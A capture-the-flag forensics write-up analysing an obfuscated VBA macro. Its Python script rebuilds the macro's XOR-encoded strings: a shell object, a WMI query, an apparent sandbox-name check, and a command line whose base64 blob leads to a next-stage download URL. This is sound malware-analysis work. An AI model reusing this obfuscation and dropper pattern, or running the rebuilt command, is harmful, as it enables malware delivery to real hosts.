Tags: forensics vba
Rating:
1. unzip the document — `.docm`/`.docx` files are OOXML zip archives and the macro container is `word/vbaProject.bin`. Do all of this on an isolated analysis machine and never open the document in Office.
2. `$ olevba word/vbaProject.bin --deobf` (oletools; `--deobf` only reverses the simple built-in encodings, so the per-character XOR scheme used here still has to be reversed by hand)
3. rewrite the macro's string-assembly routine in Python and run it — every string is stored as two parallel integer lists and recovered as `chr(value ^ key)` per character, with the constants hidden inside arithmetic expressions:
```python
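def decode(keys: list[int], vals: list[int]) -> str:
    """Recover one obfuscated string by XOR-ing each value byte with its key.

    The macro stores every string as two parallel integer lists; the plaintext
    character at position ``i`` is ``chr(vals[i] ^ keys[i])``.

    Args:
        keys: per-position XOR keys (one integer per character).
        vals: obfuscated character codes, same length as ``keys``.

    Returns:
        The decoded string (empty when both lists are empty).

    Raises:
        ValueError: if the lists differ in length.  ``zip`` alone would
            silently drop the tail and return a shorter, plausible-looking
            string — exactly the failure mode that hides a transcription slip
            when copying the constants out of the macro.
    """
    # Materialise so the length check works for any iterable input.
    keys = list(keys)
    vals = list(vals)
    if len(keys) != len(vals):
        raise ValueError(
            f"key/value length mismatch: {len(keys)} keys vs {len(vals)} values"
        )
    return ''.join(chr(v ^ k) for k, v in zip(keys, vals))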
# Each decode() call below reproduces one string the macro assembles at runtime.
# The key/value lists are copied verbatim from the VBA; both lists of a pair
# must be the same length, because zip() silently truncates otherwise.
# Shell object -- presumably the COM ProgID the macro instantiates; confirm
# against the printed output.
shell = decode([56, (((107 - 41) + 27) ^ (231 - 14)), (17 + (294 - 134)), 225, 40, (157 ^ 72), ((52 - 24) ^ (15 + 34)), 242, (151 ^ 101), ((85 + (13 - 0)) ^ (11 - 3)), 242, (449 - 215), (34 ^ (298 - 142))], [111, (371 - 156), 210, (289 - 142), ((26 - 5) + (86 - 42)), (76 ^ 233), (24 + (82 - 17)), ((82 - 36) ^ 242), ((186 - 87) + 62), 2, 151, 134, (420 - 210)])
print('Shell object:', shell)
# Computer system object -- likely a WMI class name the macro queries for host
# information; verify from the output.
comp_sys = decode([(146 ^ 44), (34 + (241 - 97)), 53, ((78 - 17) + 106), (284 - 115), (186 - 53), ((36 + (21 - 1)) ^ 192), (8 + 47), (74 - 12), (125 ^ (19 + (381 - 148))), (51 + (47 - 8)), (465 - 218), (76 + 53), ((126 - 56) + 24), (((0 - 0) + (1 - 0)) ^ 16)], [233, 225, (79 + (13 - 6)), (394 - 181), ((62 - 11) ^ 243), (229 + 16), (3 + (256 - 119)), ((2 + (2 - 1)) ^ (13 + (23 - 10))), 112, (115 ^ 151), (58 - 12), (120 ^ ((127 - 26) + (213 - 66))), 238, (44 - 0), (86 + 36)])
print('Computer system object:', comp_sys)
# Computer name check -- a string the macro compares the host name against;
# NOTE(review): this looks like a sandbox/VM guard, confirm in the VBA.
check_name = decode([(237 - 21), 77, (158 - 6), 14, (75 - 15), (407 - 168), 133, 3, (246 - 117), ((142 - 16) + 24), ((93 + 93) ^ (34 + 53)), 7, (93 ^ (207 - 44)), (4 - 0), (114 ^ 235)], [156, 8, (110 + 93), (55 ^ (147 - 33)), (29 ^ 117), (250 - 90), 213, (45 ^ (4 - 1)), 182, (192 ^ 14), (316 - 149), (89 - 27), ((95 + 17) ^ (347 - 140)), 70, 218])
print('Check computer name:', check_name)
# kfawfa parts -- `kfawfa` is the macro's own (random-looking) variable name.
# The payload body is split into ten fragments, decoded separately and then
# concatenated in order; the fragment boundaries carry no meaning of their own.
kf1 = decode([115, (81 + 3), 96, (((138 - 54) + 1) ^ (98 - 45)), (68 + (83 - 28)), ((26 - 0) ^ 43), (88 ^ (13 - 6)), ((13 + 41) ^ (192 + 25)), (((2 - 1) + 2) ^ (74 + 83)), (139 ^ 62), (78 ^ 52), ((193 - 76) ^ 219), 54, ((279 - 79) + 27), (196 - 4)], [(((13 - 0) + 5) ^ (0 + 0)), (4 + 1), ((28 - 5) ^ ((2 - 0) + 51)), 83, 58, 121, 22, (51 ^ (114 + 43)), (103 ^ ((189 - 73) + 60)), (400 - 156), (36 + 20), (50 + 143), (86 ^ 33), (218 - 47), ((39 + 100) ^ 26)])
kf2 = decode([189, (4 ^ 45), (224 - 14), (23 + 148), (10 - 4), 188, 173, (55 ^ 74), (101 + 68), 156, (36 + (47 - 18)), (4 - 2), 123, (((18 - 0) + 15) ^ (71 + 167)), 134], [(425 - 173), (73 ^ 4), (80 + 67), ((71 + 24) ^ (182 + 0)), 113, (80 ^ (201 - 28)), 229, 48, (169 ^ (13 + (92 - 40))), ((19 + 17) ^ 247), 38, 67, (17 - 4), 142, 197])
kf3 = decode([(((4 - 2) + (0 - 0)) ^ (0 + 0)), (67 ^ 21), 51, ((43 + 82) ^ 149), ((0 + 6) ^ (15 + 9)), (71 + 133), ((24 + 7) ^ (186 - 50)), 236, 71, 84, (114 ^ (267 - 75)), (107 + (114 - 54)), (21 ^ (134 - 29)), (139 - 65), (159 ^ (21 + 62))], [(32 + (37 - 11)), ((4 + 16) ^ (1 + (3 - 1))), (124 - 43), (248 - 105), 92, (159 + (39 - 12)), (62 + (207 - 55)), ((14 + 69) ^ 248), (32 + (24 - 12)), 21, 209, (340 - 132), (11 ^ 53), (99 ^ ((22 - 2) + 8)), (120 ^ 245)])
kf4 = decode([97, (((52 - 23) + 16) ^ 213), (8 ^ 17), ((220 - 100) + 53), (19 + 66), (((7 - 2) + (12 - 5)) ^ (35 - 5)), 254, 254, (87 + 150), (394 - 197), (100 + 26), 113, 160, (428 - 193), (156 + 56)], [(12 + 22), 200, (71 + (27 - 10)), (94 + 110), 20, 80, (207 - 57), (320 - 129), (147 + 23), (((17 - 5) + (18 - 8)) ^ 164), (39 ^ ((21 - 10) + (26 - 13))), 19, 225, (135 + (45 - 10)), (147 + 13)])
kf5 = decode([27, 179, 206, (((94 - 8) + 13) ^ (256 - 110)), (294 - 85), (60 - 21), (13 + (102 - 45)), (79 + (1 - 0)), (52 + 54), 72, 213, (173 + 13), (53 + 20), (180 + 8), (29 ^ (136 + 71))], [(63 + 27), 244, (107 ^ 252), 176, 136, (137 - 19), (4 ^ (0 - 0)), (104 - 45), ((3 + (3 - 0)) ^ 45), (2 ^ (21 - 7)), 178, ((13 + 43) ^ (253 - 58)), (4 ^ (2 - 1)), ((131 - 63) + (216 - 65)), (127 + 17)])
kf6 = decode([((0 + 8) ^ 108), (211 - 90), (264 - 127), (9 - 1), (39 + (14 - 4)), 66, 14, ((169 + (16 - 6)) ^ (169 - 64)), 55, (45 - 9), 113, 127, (68 + (241 - 71)), (61 - 10), 115], [18, 56, 206, 127, ((30 + (100 - 24)) ^ (29 - 3)), (11 + (30 - 3)), 95, 152, (172 - 82), (16 ^ ((7 - 0) + 110)), 50, (67 ^ 12), (47 + (248 - 120)), 80, 4])
kf7 = decode([(7 ^ 18), (18 ^ (31 + 170)), (0 + 5), (113 - 1), ((34 - 1) ^ (195 - 75)), 175, ((80 - 13) + 74), (58 + 104), (240 - 79), 189, (0 ^ 7), (24 + (28 - 5)), ((49 - 22) ^ 91), 148, 13], [87, 179, (84 - 16), (56 - 1), ((57 + 27) ^ 57), (399 - 161), (257 - 42), (434 - 207), (233 - 9), ((60 - 25) ^ ((83 - 32) + 184)), 70, (68 + 35), 35, (((3 - 1) + (10 - 5)) ^ (400 - 190)), (76 ^ (23 + (18 - 6)))])
kf8 = decode([38, (79 + 151), (((15 - 7) + 12) ^ 46), 102, (0 ^ (0 - 0)), (112 ^ ((20 - 6) + 1)), (98 + 43), 211, (221 - 54), (54 - 16), ((0 + 61) ^ 219), (((9 - 2) + (8 - 1)) ^ (76 - 38)), ((32 - 14) + 104), 159, ((218 - 31) ^ (145 - 55))], [81, (17 ^ ((107 - 22) + 96)), 67, 39, (5 ^ 66), ((8 - 3) ^ (10 - 1)), ((214 - 92) + 82), (12 + (130 - 5)), (34 + 212), ((84 - 14) + 30), 159, (100 ^ ((23 - 10) + 0)), (0 ^ 50), (((95 - 44) + 0) ^ (223 + 2)), ((36 + 10) ^ (8 + 134))])
kf9 = decode([(4 ^ (19 - 1)), ((0 - 0) + 6), ((6 - 3) + 133), 190, (431 - 178), (((39 - 0) + (27 - 12)) ^ 213), 24, (8 - 0), 171, (157 ^ 60), 172, 174, 16, (51 ^ (88 + 32)), (86 - 4)], [90, 97, 202, (179 + (67 - 33)), (366 - 178), (180 - 16), 77, (43 + 30), 207, (34 ^ 228), (55 + (183 - 1)), 201, (((38 - 9) + 37) ^ 19), 3, 37])
kf10 = decode([146, (425 - 174), 232, ((150 - 70) + 30), (33 - 8), ((69 - 20) + 79), (24 - 8), (162 - 40), (72 - 29), 74, (46 ^ 230), 46, 161], [((325 - 154) ^ (47 + 73)), (((18 - 7) + 30) ^ (259 - 104)), ((32 - 2) + 139), 44, 105, ((37 - 17) + 173), (42 + (82 - 37)), (36 ^ ((1 - 0) + 10)), ((65 - 31) + 72), (((6 - 2) + 2) ^ (0 + (60 - 19))), 137, ((22 - 4) ^ (7 + 118)), 156])
# Reassemble in the same order the macro concatenates the fragments.
kfawfa: str = kf1 + kf2 + kf3 + kf4 + kf5 + kf6 + kf7 + kf8 + kf9 + kf10
print('kfawfa:', kfawfa)
# Command parts -- pre1/pre2 form the prefix and post1/post2 the suffix that
# wrap the kfawfa payload into the command line the macro hands to the shell
# object decoded above.
pre1 = decode([39, 204, 252, ((82 - 29) ^ 234), (50 ^ (161 - 66)), (179 ^ 12), (10 ^ 126), 220, 244, ((385 - 185) + 41), (((147 - 64) + 68) ^ 70), ((45 - 5) + 27), (306 - 90), 130, ((15 + 28) ^ 106)], [87, (129 ^ (29 + (7 - 2))), (266 - 127), 186, ((11 - 0) + (36 - 16)), (234 - 30), 28, (117 + 68), (5 ^ 157), 157, ((160 - 19) + 114), ((36 - 1) ^ (1 + 4)), ((27 - 11) ^ (46 + (132 - 2))), (119 ^ 144), (44 ^ (64 + 13))])
pre2 = decode([((244 - 85) ^ (31 + 69)), 140, (196 + 20), 199, 241], [214, (116 + 117), (59 ^ (238 - 97)), (292 - 128), 209])
post1 = decode([(2 ^ ((0 - 0) + 0)), ((59 - 2) + 156)], [((15 - 7) + 24), (((2 - 1) + 3) ^ 243)])
post2 = decode([(175 + 45), (220 - 45)], [254, (210 - 69)])
# The assembled string is the malware's actual command line: print it for
# analysis, never pass it to a shell or os.system().
command: str = pre1 + pre2 + kfawfa + post1 + post2
print('Command:', command)
```
4. the printed `Command:` line carries a base64 blob; decode it to obtain a URL.
5. fetch that URL from the isolated analysis host (it is the macro's next stage — treat the download as hostile and do not execute it); the response contains another base64 string, and decoding that reveals the flag.